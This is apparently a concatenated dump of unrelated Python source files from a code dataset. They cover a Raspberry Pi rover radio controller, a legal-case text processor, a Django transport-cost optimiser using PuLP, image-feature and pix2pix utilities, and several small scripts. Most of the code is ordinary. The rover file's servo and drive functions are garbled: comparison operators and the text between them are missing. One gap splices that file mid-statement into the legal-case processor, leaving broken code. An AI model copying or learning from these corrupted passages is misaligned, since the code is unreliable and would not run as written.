string\n If you have the class RADIO_SYNC this inner class must exist or the system want start\n '''\n\n @staticmethod\n def on_sync(seconds_since_last_ok_ping):\n '''\n seconds_since_last_ok_ping: Seconds since last sync that went OK (send or reseive)\n Will fire after every sync on the client (ones a second or when steelsquid_kiss_global.radio_interrupt() is executed)\n This will also be executed on server (When sync is reseived or about every seconds when no activity from the client).\n '''\n # Stop drive if no commadn in 1 second\n if seconds_since_last_ok_ping>1:\n RADIO_SYNC.CLIENT.is_cruise_on = False\n DYNAMIC.cruise_enabled = False\n GLOBAL.drive(0, 0)\n # Check if connection is lost\n if seconds_since_last_ok_ping>steelsquid_hmtrlrs.LINK_LOST_SUGGESTION:\n GLOBAL.connection_lost()\n else:\n # Enable or disable network\n if steelsquid_nm.get_network_status()!=RADIO_SYNC.CLIENT.is_network_on:\n steelsquid_nm.set_network_status(RADIO_SYNC.CLIENT.is_network_on)\n # Cruise control\n if RADIO_SYNC.CLIENT.is_cruise_on and not DYNAMIC.cruise_enabled:\n DYNAMIC.cruise_enabled = True\n GLOBAL.drive(0, 0)\n elif not RADIO_SYNC.CLIENT.is_cruise_on and DYNAMIC.cruise_enabled:\n DYNAMIC.cruise_enabled = False\n GLOBAL.drive(0, 0)\n # Headlamps\n GLOBAL.headlights(RADIO_SYNC.CLIENT.is_headlights_on) \n # highbeam\n GLOBAL.highbeam(RADIO_SYNC.CLIENT.is_highbeam_on) \n # highbeam\n GLOBAL.video(RADIO_SYNC.CLIENT.is_video_on) \n # Slow speed\n if RADIO_SYNC.CLIENT.is_slow_on:\n DYNAMIC.current_max = STATIC.motor_slow_max\n else:\n DYNAMIC.current_max = STATIC.motor_max\n \n \n\n\n class CLIENT(object):\n '''\n All varibales in this class will be synced from the client to the server\n '''\n # Enable/disable the network (wifi)\n is_network_on = True\n\n # Enable/disable the video transmitter and reseiver\n is_video_on = False\n \n # Is cruise control enabled\n is_cruise_on = False\n \n # Is the headlights on\n is_headlights_on = False\n\n # Is the highbeam on\n is_highbeam_on = False\n\n # Is slow mode on\n is_slow_on = False\n \n \n class SERVER(object):\n '''\n All varibales in this class will be synced from the server to the client\n '''\n # Voltage for the rover\n voltage_rover = 0.0\n\n\n\n\n\n\nclass RADIO_PUSH_1(object):\n '''\n Class RADIO_PUSH_1 (to 4)\n If you use a HM-TRLR-S and it is enabled (set-flag hmtrlrs_server) this class will make the client send the\n values of variables i this class to the server.\n You can have 4 RADIO_PUSH classes RADIO_PUSH_1 ti RADIO_PUSH_4\n This is faster than RADIO_SYNC because the client do not need to wait for ansver fron server\n OBS! The variables most be in the same order in the server and client\n It will not read anything back (if you want the sync values from the server use RADIO_SYNC)\n So all varibales in this class will be the same on the server and client, but client can only change the values.\n staticmethod: on_push()\n You must have this staticmethod or this functionality will not work\n On client it will fire before every push sent (ones every 0.01 second), return True or False\n True=send update to server, False=Do not send anything to server\n On server it will fire on every push received\n '''\n \n # Speed of the motors\n motor_left = 0\n motor_right = 0\n\n\n @staticmethod\n def on_push():\n '''\n You must have this staticmethod or this functionality will not work\n On client it will fire before every push sent (ones every 0.01 second), return True or False\n True=send update to server, False=Do not send anything to server\n On server it will fire on every push received\n '''\n GLOBAL.drive(RADIO_PUSH_1.motor_left, RADIO_PUSH_1.motor_right)\n\n\n\n\n\n\nclass RADIO_PUSH_2(object):\n '''\n Class RADIO_PUSH_1 (to 4)\n If you use a HM-TRLR-S and it is enabled (set-flag hmtrlrs_server) this class will make the client send the\n values of variables i this class to the server.\n You can have 4 RADIO_PUSH classes RADIO_PUSH_1 ti RADIO_PUSH_4\n This is faster than RADIO_SYNC because the client do not need to wait for ansver fron server\n OBS! The variables most be in the same order in the server and client\n It will not read anything back (if you want the sync values from the server use RADIO_SYNC)\n So all varibales in this class will be the same on the server and client, but client can only change the values.\n staticmethod: on_push()\n You must have this staticmethod or this functionality will not work\n On client it will fire before every push sent (ones every 0.01 second), return True or False\n True=send update to server, False=Do not send anything to server\n On server it will fire on every push received\n '''\n \n # Speed of the motors\n camera_pan = STATIC.servo_position_pan_start\n camera_tilt = STATIC.servo_position_tilt_start\n\n\n @staticmethod\n def on_push():\n '''\n You must have this staticmethod or this functionality will not work\n On client it will fire before every push sent (ones every 0.01 second), return True or False\n True=send update to server, False=Do not send anything to server\n On server it will fire on every push received\n '''\n GLOBAL.camera(RADIO_PUSH_2.camera_pan, RADIO_PUSH_2.camera_tilt)\n\n\n\n\n\n\nclass GLOBAL(object):\n '''\n Put global staticmethods in this class, methods you use from different part of the system.\n Maybe the same methods is used from the WEB, SOCKET or other part, then put that method her.\n It is not necessary to put it her, you can also put it direcly in the module (but i think it is kind of nice to have it inside this class)\n '''\n\n\n @staticmethod\n def write_message(message=None, is_errorr=False):\n '''\n Write message to LCD\n ''' \n DYNAMIC.stop_next_lcd_message=True\n steelsquid_utils.shout(string=message, is_error=is_errorr)\n\n\n @staticmethod\n def connection_lost():\n '''\n The connection to remote is lost\n ''' \n steelsquid_pi.gpio_flash(26, None, 0.1)\n \n\n @staticmethod\n def horn():\n '''\n Sound horn for a second\n '''\n pass\n steelsquid_pi.gpio_flash(6, None, 0.5)\n\n\n @staticmethod\n def headlights(status):\n '''\n headlights\n '''\n steelsquid_pi.gpio_set(26, status)\n\n\n @staticmethod\n def highbeam(status):\n '''\n highbeam\n '''\n steelsquid_pi.gpio_set(13, status)\n\n\n @staticmethod\n def video(status):\n '''\n Is video on\n '''\n steelsquid_pi.gpio_set(19, status)\n\n\n @staticmethod\n def camera(pan, tilt):\n '''\n Move servo\n '''\n if pan!=None:\n if panSTATIC.servo_position_pan_max:\n pan = STATIC.servo_position_pan_max\n steelsquid_pi.pca9685_move(14, pan)\n if tilt!=None:\n if tiltSTATIC.servo_position_tilt_max:\n tilt = STATIC.servo_position_tilt_max\n steelsquid_pi.pca9685_move(15, tilt)\n\n\n @staticmethod\n def drive(left, right):\n '''\n Drive\n '''\n # Cruise controll\n if RADIO_SYNC.CLIENT.is_cruise_on:\n GLOBAL.cruise_enabled = True\n if left > right:\n diff = left - right\n left = DYNAMIC.current_max\n right = DYNAMIC.current_max - diff/2\n else:\n diff = right - left\n left = DYNAMIC.current_max - diff/2\n right = DYNAMIC.current_max\n # Check values\n if left>DYNAMIC.current_max:\n left = DYNAMIC.current_max\n elif leftDYNAMIC.current_max:\n right = DYNAMIC.current_max\n elif right 1:\n ratio = 1\n if train_ratio < 0:\n ratio = 0\n \n trainListSize = int(completeListSize * ratio)\n train_list = case_list[0:trainListSize]\n test_list = case_list[trainListSize:]\n self.writeYmlFile(yml_file, train_list)\n self.writeTestFile(test_file, test_list)\n \n def buildLawCase(self, content):\n content_str = str(content)\n lawcase_id = 0\n if content_str.find('【--') != -1 and content_str.find('--】') != -1:\n start_idx = str(content).find('【--') + len('【--')\n end_idx = str(content).index('--】')\n lawcase_id = str(content)[start_idx:end_idx]\n # print(lawcase_id)\n else:\n return None\n \n if self.debug_level == 'DEBUG':\n print(\"Building LawCase Object for case: \" + lawcase_id)\n \n if content_str.find('[原告诉称]') == -1:\n if self.debug_level == 'DEBUG':\n print(\"This case does not have [原告诉称] field: \" + lawcase_id)\n return None\n \n lawcase = LawCase(lawcase_id)\n start_idx = content_str.find('[原告诉称]') + len('[原告诉称]')\n end_idx = content_str.find('[', start_idx)\n accuse_str = content_str[start_idx:end_idx]\n \n start_idx = 0\n end_idx = 0\n error_note = False\n cu_list = []\n \n start_idx = accuse_str.find('【', end_idx)\n while start_idx != -1:\n start_idx += 1\n # In case of no closing bracket\n end_idx = accuse_str.find('】', start_idx)\n if end_idx == -1:\n break\n tmp_idx = accuse_str.find('【', start_idx)\n if tmp_idx != -1 and tmp_idx < end_idx:\n end_idx = tmp_idx - 1\n start_idx = end_idx + 1\n continue\n chunck = accuse_str[start_idx:end_idx]\n end_idx += 1\n \n idx = chunck.find(':')\n if idx != -1:\n factor = chunck[0:idx]\n description = chunck[idx + 1:]\n try:\n cu = ContentUnit(factor, description)\n cu_list.append(cu)\n except NoKeyFactorException:\n if self.debug_level == 'DEBUG':\n print(\"Key factor \" + factor + \" not found!\")\n \n # print(factor)\n # print(description)\n else:\n error_note = True\n \n start_idx = accuse_str.find('【', end_idx)\n \n lawcase.content = cu_list\n return lawcase\n \n def readfile2casestr(self, input_file):\n with open(input_file, encoding='utf-8') as f:\n content = f.readlines()\n \n case_str_list = []\n case_str = ''\n for idx, line in enumerate(content):\n if (line.startswith('【--') and not case_str == '') or idx == len(\n content) - 1:\n case_str_list.append(case_str)\n case_str = ''\n case_str += line\n return case_str_list\n \n def writeYmlFile(self, output_file, caseList):\n with open(output_file, encoding='utf-8', mode='w') as f:\n f.write(\"categories:\\n\")\n f.write(\"- CaseStudy\\n\")\n f.write(\"conversations:\\n\")\n for idx, case in enumerate(caseList):\n cu_list = case.content\n for index, cu in enumerate(cu_list):\n f.write(\"- - \" + cu.text.strip().replace('\\n', '') + \"\\n\")\n f.write(\" - \" + cu.factor.strip().replace('\\n', '') + \"\\n\")\n \n def writeTestFile(self, test_file, caseList):\n with open(test_file, encoding='utf-8', mode='w') as f:\n f.write(\"--------LABEL TEST----------\\n\")\n for idx, case in enumerate(caseList):\n cu_list = case.content\n for index, cu in enumerate(cu_list):\n f.write(\"[Question]\" + cu.text.strip().replace('\\n', '') + \"\\n\")\n f.write(\"[Answer]\" + cu.factor.strip().replace('\\n', '') + \"\\n\")\n \n def readTestFile(self, test_file):\n with open(test_file, encoding='utf-8', mode='r') as f:\n content = f.readlines()\n \n cu_list = []\n text = ''\n factor = ''\n for idx, line in enumerate(content):\n if line.startswith('[Question]') or line.startswith('[Answer]'):\n if line.startswith('[Question]'):\n text = line[len('[Question]'):-1]\n if line.startswith(('[Answer]')):\n factor = line[len('[Answer]'):-1]\n cu = ContentUnit(factor, text)\n cu_list.append(cu)\n \n return cu_list\n","repo_name":"LawBot/lawbot","sub_path":"TextProcessor/LabeledCaseProcessor.py","file_name":"LabeledCaseProcessor.py","file_ext":"py","file_size_in_byte":5561,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"15398862443","text":"\"\"\"\nDefinition of views.\n\"\"\"\n\nfrom datetime import datetime\nfrom django.shortcuts import render\nfrom django.http import HttpRequest\nfrom django.http import HttpResponseRedirect\nfrom app.forms import Dostawcy\nfrom app.forms import Odbiorcy\nfrom app.forms import Koszty\nfrom pulp import *\n\n\n#from app.forms import Odbiorca1\n#from app.forms import Odbiorca2\n#from app.forms import Odbiorca3\n\n\n\ndef home(request):\n if request.method == 'POST':\n dostawcy = Dostawcy(request.POST)\n odbiorcy = Odbiorcy(request.POST)\n koszty = Koszty(request.POST)\n if dostawcy.is_valid() and odbiorcy.is_valid() and koszty.is_valid() :\n deliver1 = int(dostawcy.cleaned_data['deliver1'])\n deliver2 = int(dostawcy.cleaned_data['deliver2'])\n deliver3 = int(dostawcy.cleaned_data['deliver3'])\n\n receiver1 = int(odbiorcy.cleaned_data['receiver1'])\n receiver2 = int(odbiorcy.cleaned_data['receiver2'])\n receiver3 = int(odbiorcy.cleaned_data['receiver3'])\n\n d1o1 = int(koszty.cleaned_data['d1o1'])\n d1o2 = int(koszty.cleaned_data['d1o2'])\n d1o3 = int(koszty.cleaned_data['d1o3'])\n \n d2o1 = int(koszty.cleaned_data['d2o1'])\n d2o2 = int(koszty.cleaned_data['d2o2'])\n d2o3 = int(koszty.cleaned_data['d2o3'])\n \n d3o1 = int(koszty.cleaned_data['d3o1'])\n d3o2 = int(koszty.cleaned_data['d3o2'])\n d3o3 = int(koszty.cleaned_data['d3o3'])\n\n\n\n Warehouses = [0,1,2]\n supply = { 0: deliver1,\n 1: deliver2,\n 2: deliver3\n }\n Distributors = [0, 1, 2]\n demand = { 0: receiver1,\n 1: receiver2,\n 2: receiver3\n }\n #static variables for debugging purposes\n costs = [ #dsitributors\n #D E F\n #[3, 5, 7],#A Warehouse\n #[12, 10, 9],#B Warehouse\n #[13, 3, 9],#C Warehouse\n\n #D E F\n [d1o1, d1o2, d1o3],#A Warehouse\n [d2o1, d2o2, d2o3],#B Warehouse\n [d3o1, d3o2, d3o3],#C Warehouse\n \n ]\n\n prob = LpProblem(\"Transportation Problem\",LpMinimize)\n \n\n\n Routes = [(x,y) for x in Warehouses for y in Distributors]\n route_vars = LpVariable.dicts(\"Droga \",(Warehouses,Distributors),0,None,LpInteger)\n\n prob += lpSum([route_vars[x][y]*costs[x][y] for (x,y) in Routes]), \"Sum of Transporting Costs\"\n for x in Warehouses:\n prob += lpSum([route_vars[x][y] for y in Distributors]) <= supply[x], \"Sum of Products out of Warehouse %s\"%x\n for y in Distributors:\n prob += lpSum([route_vars[x][y] for x in Warehouses]) >= demand[y], \"Sum of Products into Distributors %s\"%y\n\n\n prob.writeLP(\"TransportationProblem.lp\")\n prob.solve()\n print(\"Status:\", LpStatus[prob.status])\n for v in prob.variables():\n v.name = v.name.replace(\"__0\",\" A \")\n v.name = v.name.replace(\"___0\",\"-D\")\n print(v.name, \"=\", v.varValue)\n print(\"Total Cost of transportation = \", value(prob.objective))\n finalCost = value(prob.objective)\n\n listVariables = prob.variables()\n d1o1_result = (listVariables[0].varValue)\n d1o2_result = (listVariables[1].varValue)\n d1o3_result = (listVariables[2].varValue)\n \n d2o1_result = (listVariables[3].varValue)\n d2o2_result = (listVariables[4].varValue)\n d2o3_result = (listVariables[5].varValue)\n \n d3o1_result = (listVariables[6].varValue)\n d3o2_result = (listVariables[7].varValue)\n d3o3_result = (listVariables[8].varValue)\n \n return render(\n request,\n 'app/solution.html',\n {\n 'dostawcy':Dostawcy,\n 'odbiorcy':Odbiorcy,\n 'koszty':Koszty,\n 'finalCost':finalCost,\n 'd1o1_result':d1o1_result,\n 'd1o2_result':d1o2_result,\n 'd1o3_result':d1o3_result,\n\n 'd2o1_result':d2o1_result,\n 'd2o2_result':d2o2_result,\n 'd2o3_result':d2o3_result,\n \n 'd3o1_result':d3o1_result,\n 'd3o2_result':d3o2_result,\n 'd3o3_result':d3o3_result,\n\n\n 'title':'Strona główna',\n 'year':datetime.now().year,\n } \n )\n\n else:\n dostawcy = Dostawcy()\n odbiorcy = Odbiorcy()\n koszty = Koszty()\n\n assert isinstance(request, HttpRequest)\n return render(\n request,\n 'app/index.html',\n {\n 'dostawcy':Dostawcy,\n 'odbiorcy':Odbiorcy,\n 'koszty':Koszty,\n\n 'title':'Strona główna',\n 'year':datetime.now().year,\n } \n )\n\n\n\ndef contact(request):\n \"\"\"Renders the contact page.\"\"\"\n assert isinstance(request, HttpRequest)\n return render(\n request,\n 'app/contact.html',\n {\n 'title':'Kontakt',\n 'message':'Kontakt ze mną',\n 'year':datetime.now().year,\n }\n )\n\ndef teoria(request):\n \"\"\"Renders the contact page.\"\"\"\n assert isinstance(request, HttpRequest)\n return render(\n request,\n 'app/teoria.html',\n {\n 'title':'Teoria',\n 'message':'',\n 'year':datetime.now().year,\n }\n )\n\ndef about(request):\n \"\"\"Renders the about page.\"\"\"\n assert isinstance(request, HttpRequest)\n return render(\n request,\n 'app/about.html',\n {\n 'title':'About',\n 'message':'Your application description page.',\n 'year':datetime.now().year,\n }\n )\n\n\n\n","repo_name":"letsdisappear/boil-piotrdkamilk","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34605747497","text":"import numpy as np\nfrom typing import List\nimport joblib\n\nimport torch\nfrom torch import nn\nfrom torchvision.models import resnet18, resnet50\nfrom torchvision.transforms import transforms\nfrom torchvision.datasets import ImageFolder\nfrom torch.utils.data import DataLoader\n\nfrom sklearn.decomposition import PCA as Sklearn_PCA\n\nfrom fundus_extractor.utils.datasets import Fundus_Left_Right_Combined_Dataset\n\n\nclass ImageEncoder(nn.Module):\n def __init__(self, backbone_model: str, **kwargs):\n super().__init__(**kwargs)\n if backbone_model == 'resnet18':\n model = resnet18(pretrained=True)\n elif backbone_model == 'resnet50':\n model = resnet50(pretrained=True)\n else:\n raise NotImplementedError(f'Backbone model {backbone_model} not implemented!')\n self.features = nn.Sequential(*list(model.children())[:-1])\n\n def forward(self, x: torch.Tensor) -> torch.Tensor:\n return self.features(x)\n\n\ndef extract_features(model: nn.Module, dataloader: DataLoader, device: torch.device) -> np.ndarray:\n features = []\n model.eval()\n with torch.no_grad():\n for inputs, _ in dataloader:\n inputs = inputs.to(device)\n output = model(inputs)\n features.append(output.cpu().numpy())\n features = np.concatenate(features, axis=0)\n return features\n\n\ndef fit(train_dataloader: DataLoader, n_components: int, backbone_model: str, model_save_path: str,\n device: torch.device) -> None:\n model = ImageEncoder(backbone_model).to(device)\n\n features = extract_features(model, train_dataloader, device)\n\n pca = Sklearn_PCA(n_components=n_components)\n pca.fit(features)\n joblib.dump(pca, model_save_path)\n","repo_name":"Ludwig-Graef/OCT_Feature_Extractor","sub_path":"fundus_extractor/models/.ipynb_checkpoints/pretrained_pca-checkpoint.py","file_name":"pretrained_pca-checkpoint.py","file_ext":"py","file_size_in_byte":1729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72793617012","text":"import os, sys, time\r\nimport importlib\r\nROOT_DIR = os.path.dirname(os.path.abspath(__file__))\r\nsys.path.append(os.path.join(ROOT_DIR, \"models\"))\r\nimport utils\r\n\r\nif __name__ == \"__main__\":\r\n model_name = utils.parse_args_name(sys.argv, \"model\")\r\n output_path = utils.parse_args_name(sys.argv, \"output_path\")\r\n if not os.path.exists(output_path):\r\n os.mkdir(output_path)\r\n OUTPUT_DIR = os.path.join(output_path, time.strftime(\"%Y%m%d%H%M\", time.localtime()))\r\n if os.path.exists(OUTPUT_DIR):\r\n os.system(\"rm -rf %s\" % OUTPUT_DIR)\r\n os.mkdir(OUTPUT_DIR)\r\n os.system(\"cp scripts/run_%s.sh %s\" % (model_name, OUTPUT_DIR))\r\n os.system(\"cp models/%s.py %s\" % (model_name, OUTPUT_DIR))\r\n PRFILE_PATH = os.path.join(OUTPUT_DIR, \"prfile\")\r\n os.mkdir(PRFILE_PATH)\r\n SNAPSHOT_PATH = os.path.join(OUTPUT_DIR, \"snapshot\")\r\n os.mkdir(SNAPSHOT_PATH)\r\n log_fp = open(os.path.join(OUTPUT_DIR, \"log.txt\"), 'w')\r\n logger = utils.Logger(log_fp)\r\n try:\r\n MODEL = importlib.import_module(model_name)\r\n MODEL.train(SNAPSHOT_PATH, PRFILE_PATH, verbose=True, logger=logger)\r\n log_fp.close()\r\n except KeyboardInterrupt:\r\n logger(\"Interrupted.\")\r\n log_fp.close()\r\n os.system(\"rm -rf %s\" % OUTPUT_DIR)\r\n try:\r\n sys.exit(0)\r\n except SystemExit:\r\n os._exit(0)\r\n except Exception as e:\r\n import traceback\r\n logger(\"Got exception.\")\r\n log_fp.close()\r\n print(traceback.format_exc())\r\n os.system(\"rm -rf %s\" % OUTPUT_DIR)\r\n","repo_name":"ybch14/RelationExtraction-NIS-PyTorch","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":1567,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"21"} +{"seq_id":"28884405322","text":"#recebe o preco de produtos e depois retorna informacao sobre o total da compra e qual foi o item mais barato e o mais caro.\ntotalcompra = 0\npm1000 = 0\ntotalitem = 0\nnomeproduto = str(input('Nome do produto: '))\ntotalitem += 1\nnprodmaisbarato = nomeproduto\npreco = float(input('PRECO: R$ '))\ntotalcompra += preco\nprodmaisbarato = preco\ncontinuacao = input('Quer continuar? ')\nwhile True:\n nomeproduto = str(input('Nome do produto: '))\n totalitem += 1\n preco = float(input('PRECO: R$ '))\n if preco < prodmaisbarato:\n prodmaisbarato = preco\n nprodmaisbarato = nomeproduto\n totalcompra += preco\n continuacao = input('Quer continuar? ')\n if preco > 1000:\n pm1000 += 1\n if continuacao == 'n':\n print('{:-^40}'.format('FIM DO PROGRAMA'))\n print(f'Foram comprados {totalitem} itens')\n print(f'O total da compra foi de R${totalcompra:.2f}')\n print(f'Temos {pm1000} custando a cima de R$1000.00 ')\n print(f'O produto mais barato foi {nprodmaisbarato} que custa R${prodmaisbarato:.2f}')\n break","repo_name":"MatheusCaP/PythonProjects","sub_path":"Repeticao - WHILE/AnalisedePrecodeProdutos.py","file_name":"AnalisedePrecodeProdutos.py","file_ext":"py","file_size_in_byte":1070,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"43183950452","text":"#!/usr/bin/env python\n# -*- codong: utf-8 -*-\n\nimport unittest\nfrom unittest import TestCase\nimport zmq\nfrom zmq.tests import BaseZMQTestCase, have_gevent, GreenTest\nfrom time import sleep\nfrom dsat.message import send_vector, parse_event\n\nclass TestSendParse(BaseZMQTestCase):\n\n def test_consistency(self):\n s1, s2 = self.create_bound_pair(zmq.PUSH,zmq.PULL)\n sleep(.1)\n msg = dict( \n job_id=1,\n task_id=1,\n seq = 1,\n where = \"here\",\n next = \"generation\",\n wid = 2,\n event = \"whatever\",\n state = \"nawak\",\n step = \"this\",\n pid = 123,\n arg = dict( a = 1, b = 2),\n type = \"test\",\n )\n send_vector(s1, msg)\n v = parse_event(s2)\n self.assertEqual(v[\"seq\"], \"2\")\n for k,v in msg.items():\n if \"seq\" != k:\n self.assertEqual(v, msg[k])\n\n\nif __name__ == '__main__':\n unittest.main(verbosity=4)\n\n\n","repo_name":"jul/dsat","sub_path":"dsat/test/test_st_send_parse.py","file_name":"test_st_send_parse.py","file_ext":"py","file_size_in_byte":1054,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"43293193951","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Oct 30 13:02:00 2014\n\n@author: bmmorris\n\"\"\"\n\nfrom glob import glob\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\nmodels = glob('../../../../../uw/classes/astr521/hw1/dat/uk??v.dat')\n#models = glob('../../../../../uw/classes/astr521/hw1/dat/uk??iv.dat')\n\ndef getspectrum(filename):\n input_file = open(filename,'r').read().splitlines()[3:]\n #Each of the 131 flux.dat files contains 3 header lines with a # in the first\n #column, and several columns of data. The first column is wavelength in\n #Angstrom, always 1150 - 10620A in steps of 5A. The second column is\n #F(lambda) for the relevant spectrum, normalised to unity at 5556A. The third\n #column is the rms flux error on the same scale. Columns 4-N (Nmax=10)\n #contain the components used, in no particular order.\n wavelength = []\n flux = []\n for line in input_file:\n splitline = line.split()\n wavelength.append(float(splitline[0]))\n flux.append(float(splitline[1]))\n return [np.array(wavelength)*1e-4,np.array(flux)/np.max(np.array(flux))]\n\nfig, ax = plt.subplots(figsize=(14,14))\nfor model in models:\n w, f = getspectrum(model)\n ax.plot(w, f, label=model.split('/')[-1])\nax.legend()\nplt.show()","repo_name":"bmorris3/mosfire_wasp6","sub_path":"analysis/notebooks/modelstars.py","file_name":"modelstars.py","file_ext":"py","file_size_in_byte":1261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15669315045","text":"def decor(spea):\n def wrapper(v,v0,t):\n spea(v,v0,t)\n print(v0*t+(((v-v0)/t)*t*t)/2)\n return wrapper\n@decor\ndef spead(V,V0,T):\n A=float((V-V0)/T)\n print(A)\ntry:\n v =int(input())\n v0=int(input())\n t =int(input())\n spead(v,v0,t)\nexcept (AttributeError,ZeroDivisionError):\n print(\"некорректные данные\")\n\n","repo_name":"ilya-tygim/freg","sub_path":"module4.py","file_name":"module4.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"9005668388","text":"import numpy as np\nfrom PIL import Image\n\n\ndef is_image_file(filename):\n return any(filename.endswith(extension) for extension in [\".png\", \".jpg\", \".jpeg\"])\n\n\ndef load_img(filepath):\n img = Image.open(filepath).convert('RGB')\n img = img.resize((512, 512), Image.BICUBIC)\n return img\n\n\ndef save_img(image_tensor, filename):\n image_numpy = image_tensor.float().numpy()\n image_numpy = (np.transpose(image_numpy, (1, 2, 0)) + 1) / 2.0 * 255.0\n image_numpy = image_numpy.clip(0, 255)\n image_numpy = image_numpy.astype(np.uint8)\n image_pil = Image.fromarray(image_numpy)\n image_pil.save(filename)\n print(\"Image saved as {}\".format(filename))\n\n\ndef celeba_label2color(label):\n color_list = [[0, 0, 0], [204, 0, 0], [76, 153, 0], [204, 204, 0],\n [51, 51, 255], [204, 0, 204], [0, 255, 255], [255, 204, 204],\n [102, 51, 0], [255, 0, 0], [102, 204, 0], [255, 255, 0],\n [0, 0, 153], [0, 0, 204], [255, 51, 153], [0, 204, 204],\n [0, 51, 0], [255, 153, 51], [0, 204, 0]]\n res = np.zeros((label.shape[0], label.shape[1], 3), dtype=np.uint8)\n for idx, color in enumerate(color_list):\n res[label == idx] = color\n\n return res\n\n\ndef get_img(image_tensor):\n image_numpy = image_tensor.float().numpy()\n image_numpy = (image_numpy + 1) / 2.0 * 18.0\n image_numpy = image_numpy.clip(0, 18)\n # image_numpy = image_numpy.astype(np.uint8)\n image_numpy = np.around(image_numpy)\n image_numpy = image_numpy[0, :, :]\n return image_numpy\n\n\ndef display(real_a_, real_b_, fake_b_, epoch_):\n a = real_a_.detach().cpu()[0, :, :, :]\n a = get_img(a)\n color = celeba_label2color(a)\n Image.fromarray(color).save(\"checkpoint/real_a_{}.png\".format(epoch_))\n\n b = real_b_.detach().cpu()[0, :, :, :]\n b = get_img(b)\n color = celeba_label2color(b)\n Image.fromarray(color).save(\"checkpoint/real_b_{}.png\".format(epoch_))\n\n b1 = fake_b_.detach().cpu()[0, :, :, :]\n b1 = get_img(b1)\n color = celeba_label2color(b1)\n Image.fromarray(color).save(\"checkpoint/fake_b_{}.png\".format(epoch_))","repo_name":"Andyzzz/facerenderer-pix2pix-hair","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2116,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"21583037941","text":"from django.shortcuts import render, redirect\nimport pandas as pd\nimport datetime\nfrom django.http import HttpResponse\nfrom LabGRis.decorators import validate_session, getSessionUser\nfrom LabGRis.funcoesCompartilhadas import criarListaDoBanco, criarListaDoBancoKEY, identificarAlternativaMarcada\nfrom LabGRis.pyrebase_settings import db\nfrom perguntas.classes.Perguntas import Pergunta\nfrom categorias.classes.Categorias import Categoria\nfrom responderFicha.classes.FichaPreenchida import FichaPreenchida\n\n\n# Bancos\nbancoModeloFicha = \"Templates de Fichas\"\ntabelaBancoFicha = \"fichaAppTeste\"\n\n# Redirecionamento de páginas\npgCampo = '/fichas/'\n\n@validate_session\ndef responderFicha(request):\n data = {}\n data['SessionUser'] = getSessionUser(request)\n data['context'] = \"\"\n\n ######### Busca Modelos de Ficha já cadastradas\n fichaSalvas = db.child(tabelaBancoFicha).get()\n listaFicha = criarListaDoBanco(fichaSalvas)\n data['listaFicha'] = listaFicha\n\n if request.method == \"POST\":\n codFicha = request.POST.getlist('codFicha', 'Pergunta não carregada')\n\n # Lista para colocar dados das fichas\n modeloFicha = []\n tituloFicha = []\n perguntasDasFichas = set()\n ## Carregando dados das fichas selecionadas\n for ficha in codFicha:\n dadosDaFicha = db.child(tabelaBancoFicha).child(ficha).get().val()\n\n modeloFicha.append(dadosDaFicha['modeloFicha'])\n tituloFicha.append(dadosDaFicha['tituloFicha'])\n\n for cat in dadosDaFicha['categorias']:\n for per in cat['perguntas']:\n perguntasDasFichas.add(per['tituloPergunta'])\n\n # Montando o dicionario para converter em DataFrame\n dadosFichas = {\n 'Segue o modelo': modeloFicha,\n 'Cód. Ficha': tituloFicha\n }\n\n # Transformando os dados em um DataFrame\n dadosFicha_df = pd.DataFrame(data=dadosFichas)\n #print(\"DataFrame da(s) fichas:\\n\", dadosFicha_df)\n\n #print('Perguntas', perguntasDasFichas)\n respostasDasPerguntas = []\n for ficha in codFicha:\n respostas = [''] * len(perguntasDasFichas)\n #print(\"----Ficha:\", ficha)\n dadosCat = db.child(tabelaBancoFicha).child(ficha).child('categorias').get().val()\n for cat in dadosCat:\n for perg in cat['perguntas']:\n for perF in perguntasDasFichas:\n if perg['tituloPergunta'] == perF:\n try:\n #print(\"Diss\", list(perguntasDasFichas).index(perF), \"\\b: \", perg['resposta'])\n respostas[list(perguntasDasFichas).index(perF)] = perg['resposta']\n except:\n for alt in perg['alternativas']:\n if alt['resposta'] == True:\n #print(\"Per\", list(perguntasDasFichas).index(perF), \"\\b: \", alt['tituloAlternativa'])\n respostas[list(perguntasDasFichas).index(perF)] = alt['tituloAlternativa']\n respostasDasPerguntas.append(respostas)\n\n # Montando dataframe das respostas\n respostasDasPerguntas_df = pd.DataFrame(respostasDasPerguntas, columns=perguntasDasFichas)\n #print(\"Respostas das fichas:\\n\", respostasDasPerguntas_df)\n\n # Juntando dados das fichas com as respostas\n csvFichas = pd.merge(dadosFicha_df, respostasDasPerguntas_df, left_index=True, right_index=True)\n #print(\"DataFrame das fichas:\\n\", csvFichas)\n\n # Disponibilizando CSV para download\n responseCSV = HttpResponse(content_type='text/csv')\n responseCSV['Content-Disposition'] = 'attachment; filename=CSV_LabGRis ' + datetime.datetime.now().strftime('%d/%m/%Y') + '.csv'\n csvFichas.to_csv(path_or_buf=responseCSV, index=False)\n\n return responseCSV\n #return redirect(pgCampo)\n\n return render(request, 'responderFicha/responderFicha.html', data)\n\n\n@validate_session\ndef modelosFicha(request):\n data = {}\n data['SessionUser'] = getSessionUser(request)\n data['context'] = \"\"\n\n # Bancos\n bancoModeloFicha = \"Templates de Fichas\"\n\n ######### Busca 